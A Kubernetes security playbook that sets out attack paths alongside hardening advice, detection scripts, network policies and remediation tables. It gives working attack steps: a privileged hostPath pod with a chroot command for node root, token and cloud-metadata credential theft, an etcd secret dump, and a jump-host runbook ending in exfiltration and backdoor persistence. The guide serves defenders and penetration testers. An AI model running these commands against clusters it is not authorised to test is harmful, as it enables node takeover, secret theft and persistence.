Kubernetes promises hard multi-tenancy, but the defaults are still optimistic. Attackers chain permissive pods, stale jump servers, broken RBAC, and flat networks to reach the control plane or underlying cloud. This playbook walks through real-world exploitation patterns and the tooling practitioners use to stay ahead.
Legal reminder: Only test clusters you own or have written consent to assess.
Threat Model Snapshot
| Layer | Weakness | Impact |
|---|---|---|
| Pod runtime | HostPath mounts, privileged containers, CAP_SYS_ADMIN | Node takeover, data exfiltration |
| Jump/Bastion hosts | Reused SSH keys, missing MFA, kubeconfig leakage | Control plane API access |
| RBAC | Wildcard verbs, system:masters bindings | Full cluster administrative control |
| Network | Flat overlay, missing policies, mis-scoped egress | Lateral movement, data staging |
| Cloud glue | IAM roles, metadata service, load balancer creds | Cross-cluster pivot, persistence |
Additional High-Risk Misconfigurations
- Anonymous API Server Access – `--anonymous-auth=true` plus `--authorization-mode=AlwaysAllow` (seen in dev clusters) lets anyone run `kubectl` verbs. Fix by disabling anonymous auth and enabling Node/ABAC/RBAC authorization.
- Unauthenticated etcd – etcd listening on `0.0.0.0:2379` without TLS exposes every secret and kubeconfig; lock it to localhost or private subnets with cert-based auth.
- Disabled Admission Controllers – Without `PodSecurity`, `NodeRestriction`, or `ImagePolicyWebhook`, attackers can schedule privileged pods or run unscanned images freely.
- Legacy Dashboard – The deprecated Kubernetes Dashboard 1.10 still defaults to cluster-admin; always require OIDC and restrict via NetworkPolicy.
- NodePort + ExternalLB Drift – Services exposed via NodePort remain reachable even after the LoadBalancer is deleted, creating forgotten entry points.
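The anonymous-auth and authorization-mode misconfigurations above can be checked offline. A minimal sketch in Python, assuming the conventional static-pod manifest path `/etc/kubernetes/manifests/kube-apiserver.yaml`; the embedded sample text is synthetic, not from a real cluster:

```python
# Sketch: flag risky kube-apiserver flags in a static-pod manifest.
# The flag strings below are real apiserver flags; the sample manifest
# is illustrative only.

RISKY = {
    "--anonymous-auth=true": "anonymous requests are authenticated",
    "--authorization-mode=AlwaysAllow": "every authenticated request is authorized",
    "--insecure-port=8080": "legacy unauthenticated HTTP port enabled",
}

def audit_apiserver_flags(manifest_text: str) -> list:
    """Return one human-readable finding per risky flag present."""
    return [f"{flag}: {why}" for flag, why in RISKY.items()
            if flag in manifest_text]

sample = """
spec:
  containers:
  - command:
    - kube-apiserver
    - --anonymous-auth=true
    - --authorization-mode=AlwaysAllow
"""

for finding in audit_apiserver_flags(sample):
    print("[!]", finding)
```

In practice you would read the real manifest off the control-plane node (or pull the live flags from `kubectl -n kube-system get pod -o yaml`) instead of the embedded sample.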
Exploiting Pods (Escape & Lateral)
1. HostPath & Privileged Pods
```yaml
apiVersion: v1
kind: Pod
metadata:
  name: vuln-pod
spec:
  hostPID: true
  containers:
  - name: shell
    image: alpine
    command: ["sleep", "infinity"]  # keep the container alive for exec
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /
```
If you can create or edit such a pod:
```shell
kubectl exec -it vuln-pod -- chroot /host bash
```
Result: root shell on the node, access to /var/lib/kubelet, kubelet certs, and secrets cached on disk.
2. Automated Pod Hunting
- kube-hunter detects exposed dashboards, read-only ports, anonymous Kubelets.

  ```shell
  pip install kube-hunter
  kube-hunter --remote <worker-node-ip>
  ```

- kube-bench validates CIS benchmarks to catch privileged defaults.

  ```shell
  kube-bench --targets node
  ```

- Popeye identifies risky pod specs (`allowPrivilegeEscalation`, `hostNetwork`).
3. In-Cluster Pivot
Once inside a pod, enumerate service accounts:
```shell
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT
curl -s -k -H "Authorization: Bearer $TOKEN" $APISERVER/api
```
Look for mounted cloud credentials (AWS IMDS, GCP metadata, Oracle Cloud Instance Principals) to pivot beyond the node.
4. Host File Mount Abuse
Even without a full hostPath mount of `/`, apps often mount sensitive directories:
| Mount Type | Abuse | Mitigation |
|---|---|---|
| `/var/run/docker.sock` | Control container runtime, spawn privileged siblings | Use CRI proxy, never mount socket into workloads |
| `/etc` slices | Read node config, kubelet kubeconfig, tokens | Move secrets to CSI drivers; add `readOnlyRootFilesystem` |
| `/proc` | Scrape credentials, process arguments | Deny hostPath via admission policy |
Static detection: `kubectl get pods -A -o json | jq '.items[].spec.volumes[]? | select(.hostPath)'`.
If you find writable mounts, plant cronjobs or tamper with systemd unit files for persistence.
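The jq one-liner above can be extended into a small offline checker that flags both hostPath volumes and privileged containers. A minimal sketch in Python, assuming input shaped like `kubectl get pods -A -o json`; the embedded sample is synthetic:

```python
# Sketch: scan pod-list JSON for hostPath volumes and privileged containers.
# Field names follow the Pod API schema; the sample stands in for real output.
import json

def risky_pods(pod_list: dict) -> list:
    findings = []
    for pod in pod_list.get("items", []):
        name = pod["metadata"]["name"]
        spec = pod.get("spec", {})
        for vol in spec.get("volumes", []) or []:
            if "hostPath" in vol:
                findings.append(f"{name}: hostPath -> {vol['hostPath'].get('path')}")
        for c in spec.get("containers", []):
            sc = c.get("securityContext") or {}
            if sc.get("privileged"):
                findings.append(f"{name}/{c['name']}: privileged container")
    return findings

sample = json.loads("""{
 "items": [
  {"metadata": {"name": "vuln-pod"},
   "spec": {
     "volumes": [{"name": "hostfs", "hostPath": {"path": "/"}}],
     "containers": [{"name": "shell",
                     "securityContext": {"privileged": true}}]}}
 ]}""")

for finding in risky_pods(sample):
    print("[!]", finding)
```

Feed it real cluster output (`kubectl get pods -A -o json > pods.json`) and wire it into CI to catch regressions before they ship.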
5. Service Enumeration & Lateral Movement
- DNS sweep inside the cluster:
  ```shell
  for svc in $(host -t SRV _http._tcp.default.svc.cluster.local | awk '{print $NF}'); do
    echo "[+] $svc"; nc -vz $svc 80
  done
  ```
- Kubernetes API discovery even with limited RBAC:
  ```shell
  kubectl get --raw /apis | jq '.groups[].name'
  ```
- ServiceAccount token reuse: stealing tokens from other pods (downward API, shared volumes) allows impersonation.
- Sidecar hopping: if envoy/istio-proxy shares `/etc/istio/proxy/envoy-rev.json`, use SDS certificates to reach other workloads over mTLS.
Pair this enumeration with the network-policy gap: without egress restrictions, compromised pods can port-scan overlay CIDRs, locate database StatefulSets, and exfiltrate data.
Proof-of-Concept Exploits
| Vuln | POC | Impact |
|---|---|---|
| Kubelet unauth read-only port (10255) | `curl http://node-ip:10255/pods` | Dumps running pod specs (env vars, secrets) for credential theft |
| Exposed metrics-server/heapster | `curl -k https://node-ip:4443/metrics` | Reveals cluster layout, token-bearing pods |
| Default ServiceAccount token reuse | `kubectl run steal --image=alpine --overrides='{"spec":{"serviceAccountName":"default"}}' --command -- cat /var/run/secrets/...` | Pivot within namespace, list secrets |
| NodePort admin panel | `nmap -sT node-ip -p30000-32767` then `curl http://node-ip:31000/` | Accesses dashboards meant to be internal |
| etcd without TLS/auth | `ETCDCTL_API=3 etcdctl --endpoints=http://control-plane:2379 get / --prefix` | Dumps every secret in the cluster |
Exploit lab recipe: deploy kubernetes-goat or OWASP KubeGoat to safely reproduce these paths.
Jump Server Vulnerabilities
Most production clusters hide API servers behind bastions or Zero Trust brokers. Common gaps:
- Shared SSH keys across bastions; one compromised engineer laptop unlocks every cluster.
- Cached kubeconfig on jump hosts without disk encryption.
- kubectl binaries with outdated plugins granting unintended verbs.
Hardening Moves
- Use short-lived certificates from cert-manager or an external CA; avoid long-lived `admin.conf` files.
- Enforce MFA-backed SSH (e.g., Teleport, AWS IAM Identity Center) for bastions.
- Auto-wipe `~/.kube` and credential helpers post-session.
- Monitor `kubectl proxy` and `kubectl port-forward` usage from bastions; they often precede exfiltration.
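Monitoring for `exec` and `port-forward` can be automated over the API server audit log. A minimal sketch, assuming events in the `audit.k8s.io` JSON-lines format where these calls appear as pod subresources; the sample events are synthetic:

```python
# Sketch: filter Kubernetes audit-log JSON lines for exec/port-forward/proxy
# subresource requests, which often precede exfiltration from a bastion.
import json

WATCHED_SUBRESOURCES = {"exec", "portforward", "proxy"}

def suspicious_events(lines):
    """Yield (user, namespace, pod, subresource) for watched subresources."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        obj = ev.get("objectRef") or {}
        if obj.get("subresource") in WATCHED_SUBRESOURCES:
            hits.append((ev.get("user", {}).get("username"),
                         obj.get("namespace"), obj.get("name"),
                         obj.get("subresource")))
    return hits

log_lines = [
    '{"user": {"username": "dev-bastion"}, "objectRef": {"resource": "pods", "namespace": "prod", "name": "db-0", "subresource": "exec"}}',
    '{"user": {"username": "ci-bot"}, "objectRef": {"resource": "pods", "namespace": "ci", "name": "runner", "subresource": "log"}}',
]

for user, ns, pod, sub in suspicious_events(log_lines):
    print(f"[!] {user} ran {sub} on {ns}/{pod}")
```

In production, point the same filter at your audit-log sink (file, webhook, or SIEM pipeline) rather than an in-memory list.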
RBAC Abuse Catalogue
| Misconfig | Exploit | Detection |
|---|---|---|
| ClusterRole with `verbs: ["*"]` bound to `system:serviceaccounts` | Impersonate cluster admin via compromised service account | `kubectl auth can-i --list` for each service account |
| RoleBinding to `system:masters` | Immediate god-mode | Audit subjects in every binding |
| Missing `resourceNames` on secrets/configmaps | Enumerate entire namespace secrets | Enable BoundServiceAccountTokenVolume + OIDC audiences |
| Default service account auto-mounted | Pod compromise → namespace takeover | Set `automountServiceAccountToken: false` by default |
Automation tip: Use Aqua Security's kubectl-who-can (installable as a krew plugin) to enumerate privileges programmatically.

```shell
kubectl who-can get secrets
```
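The wildcard-verb row in the table above is also easy to detect statically. A minimal sketch, assuming ClusterRole objects shaped like the RBAC API (`kubectl get clusterroles -o json` items); the sample roles are synthetic:

```python
# Sketch: flag ClusterRoles whose rules contain wildcard verbs or resources,
# the pattern called out in the RBAC abuse catalogue. Sample data is synthetic.
def wildcard_findings(cluster_roles):
    """Return names of roles with '*' in verbs or resources."""
    findings = []
    for role in cluster_roles:
        for rule in role.get("rules", []) or []:
            if "*" in rule.get("verbs", []) or "*" in rule.get("resources", []):
                findings.append(role["metadata"]["name"])
                break
    return findings

roles = [
    {"metadata": {"name": "overly-broad"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
    {"metadata": {"name": "scoped-reader"},
     "rules": [{"apiGroups": [""], "resources": ["pods"],
                "verbs": ["get", "list"]}]},
]

print(wildcard_findings(roles))  # ['overly-broad']
```

Cross-reference the flagged roles against RoleBindings/ClusterRoleBindings to see which subjects actually hold them.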
Network Segmentation Reality Check
Many orgs rely solely on CNI defaults (flannel, Calico, Cilium) without policies. Attack chain:
- Compromise one workload.
- Discover `kube-system` services via `kubectl get svc -A` (if RBAC allows) or direct DNS queries.
- Connect to internal dashboards, metrics, etc.
Network Policy Patterns
- Default deny in every namespace:

  ```yaml
  apiVersion: networking.k8s.io/v1
  kind: NetworkPolicy
  metadata:
    name: default-deny
  spec:
    podSelector: {}
    policyTypes: [Ingress, Egress]
  ```
- Egress control for internet-bound pods to stop data staging:

  ```yaml
  spec:
    egress:
    - to:
      - ipBlock:
          cidr: 0.0.0.0/0
      ports:
      - protocol: TCP
        port: 443
  ```
- Layer with service mesh policies (Istio AuthorizationPolicy, Linkerd ServerAuthz) for mTLS and authz.
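Rolling the default-deny policy out to every namespace is easy to script. A minimal sketch that renders one manifest per namespace for piping into `kubectl apply -f -`; the namespace names are placeholders:

```python
# Sketch: render a default-deny NetworkPolicy for each namespace in a list.
# Pipe the output to `kubectl apply -f -`; namespace names are examples.
TEMPLATE = """apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny
  namespace: {ns}
spec:
  podSelector: {{}}
  policyTypes: [Ingress, Egress]
"""

def render_default_deny(namespaces):
    """Return a multi-document YAML string covering every namespace."""
    return "---\n".join(TEMPLATE.format(ns=ns) for ns in namespaces)

print(render_default_deny(["dev", "staging", "prod"]))
```

Pull the real namespace list with `kubectl get ns -o name` and exclude system namespaces as policy allows.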
Multi-Cloud Nuances
AWS (EKS)
- Nodes assume IAM roles: pod compromise → `curl 169.254.169.254/latest/meta-data/iam/security-credentials/ROLE` for creds.
- Control plane access via AWS API: stolen IAM keys may create new kubeconfigs (`aws eks update-kubeconfig`).
- Use IRSA (IAM roles for service accounts) with scoped policies; monitor CloudTrail for `sts:AssumeRoleWithWebIdentity` anomalies.
GCP (GKE)
- Metadata endpoint accessible at `http://metadata.google.internal`; requests must send the `Metadata-Flavor: Google` header.
- Workload Identity binds Kubernetes service accounts to Google service accounts; misbinding leads to broad Editor rights.
- Audit `gcloud container clusters get-credentials` usage and restrict the `container.clusters.getCredentials` IAM permission.
Oracle Cloud (OKE / OPC)
- Instance principal tokens retrievable via `curl http://169.254.169.254/opc/v2/instance/` with the `Authorization: Bearer Oracle` header.
- Compartments control segmentation; mis-scoped dynamic groups let pods call OCI APIs (block storage, networking).
- Lock down `oci iam dynamic-group` policies so only specific OKE node pools can call high-impact services.
Multi-Cloud Spread Patterns
Attackers rarely stop at one provider:
- Federated kubeconfigs stored in password managers or Git repos grant access to dev clusters on other clouds.
- CI/CD runners (GitHub Actions self-hosted, GitLab, Jenkins) often have kube contexts for multiple clusters; compromise the runner and export `KUBECONFIG` to hop clouds.
- Service meshes spanning regions (Anthos, Azure Arc) use control planes with static client certs; stealing those certs unlocks every attached cluster.
- Central registries (ECR, GCR, ACR, OCIR) host images for every environment; pushing a poisoned base image compromises workloads wherever deployed.
Defensive play: enforce per-cloud workload identities (IRSA, GCP Workload Identity, OCI dynamic groups) with scoped policies, and rotate secrets whenever any cluster reports a breach.
Tool Stack
| Tool | Use Case | Notes |
|---|---|---|
| kube-hunter | Surface network exposures (dashboards, etcd, ports) | Run with `--report json` for CI ingestion |
| kube-bench | CIS compliance for control plane/nodes | Map failures to remediation backlog |
| Popeye | Hygiene scanner for namespaces/pods | Highlights deprecated APIs and insecure specs |
| Kubescape / Kubeaudit | Policy testing vs NSA/CISA hardening guide | Integrates with Argo/GitHub Actions |
| KubeArmor / Falco | Runtime detection (syscalls, Kubernetes audit logs) | Deploy DaemonSets per node |
| Trivy | Image + cluster config scanning | `trivy k8s --report summary cluster` |
Automation example (GitHub Actions):
```yaml
- name: kube-hunter (passive)
  run: kube-hunter --cidr 10.0.0.0/16 --report json > kube-hunter.json
- name: kube-bench
  run: kube-bench --targets master --json > kube-bench.json
- uses: aquasecurity/trivy-action@master
  with:
    scan-type: k8s
    format: json
    output: trivy-cluster.json
```
Jump Host to Cluster Attack Runbook
- Initial foothold on bastion via phishing or leaked SSH key.
- Harvest kubeconfig and tokens from `~/.kube` and the AWS/GCP/Azure CLIs.
- Test access: `kubectl get nodes` (watch for audit logs!).
- Enumerate RBAC and attempt privilege escalation (impersonation, token review).
- Drop privileged pod to obtain node root.
- Exfiltrate secrets (KMS data, docker registry creds) or stage persistence (mutating admission controller, CronJob backdoor).
Defensible Architecture Checklist
- Admission control: Gatekeeper/Kyverno enforcing `privileged: false`, blocking hostPath except for an allowlist.
- Short-lived credentials: integrate with SPIRE/SPIFFE or workload identity providers.
- Rotate kubelet client certs and disable anonymous auth.
- Enable audit logging with sinks to SIEM; correlate `kubectl exec` and `port-forward` events.
- Segment networks: separate node subnets per environment (dev/prod), restrict pod egress with eBPF-based CNIs.
- Disaster drills: Practice rotating service account tokens, regenerating kubeconfigs, and revoking IAM roles when a node is owned.
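The admission-control item in the checklist can look like the following Kyverno ClusterPolicy sketch. Field names follow Kyverno's validate/pattern syntax; verify the exact schema (and `validationFailureAction` casing) against the Kyverno version you run:

```yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: deny-privileged
spec:
  validationFailureAction: Enforce   # reject, rather than merely report
  rules:
  - name: no-privileged-containers
    match:
      any:
      - resources:
          kinds: [Pod]
    validate:
      message: "Privileged containers are not allowed."
      pattern:
        spec:
          containers:
          # =( ) anchors: validate the field only if it is present
          - =(securityContext):
              =(privileged): "false"
```

Pair it with a second rule restricting `hostPath` volumes to an explicit allowlist to cover the escape path shown earlier.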
Rapid Remediation Playbook
| Threat | Immediate Fix | Longer-Term Control |
|---|---|---|
| HostPath/privileged pods | Delete offending pods, cordon node, rotate kubelet certs | Gatekeeper/Kyverno policies, Pod Security Standards restricted profile |
| Lateral movement via services | Apply namespace-wide default-deny NetworkPolicies, revoke compromised ServiceAccount tokens | Service mesh authz, per-namespace egress firewalls |
| Jump host compromise | Rotate all kubeconfigs, invalidate IAM keys, rebuild bastion from golden image | Implement ephemeral bastions with MFA + short-lived certs |
| RBAC wildcard roles | Remove bindings, run `kubectl auth reconcile` to reapply hardened RBAC | CI guardrails preventing `*` verbs and namespace-wide bindings |
| Multi-cloud credential drift | Audit vaults/password managers for stale kubeconfigs, rotate registry creds | Central secret inventory with expiry, adopt SPIFFE/SPIRE across clusters |
Document every remediation in runbooks so incident responders can execute without reinventing the plan.
Further Reading & References
- NSA/CISA Kubernetes Hardening Guidance
- CNCF Kubernetes Security Audit
- Aqua kube-hunter
- Aqua kube-bench
- Falco Runtime Security
- Oracle Cloud Security Best Practices
By PlaidNox Security Team
Revised Nov 2025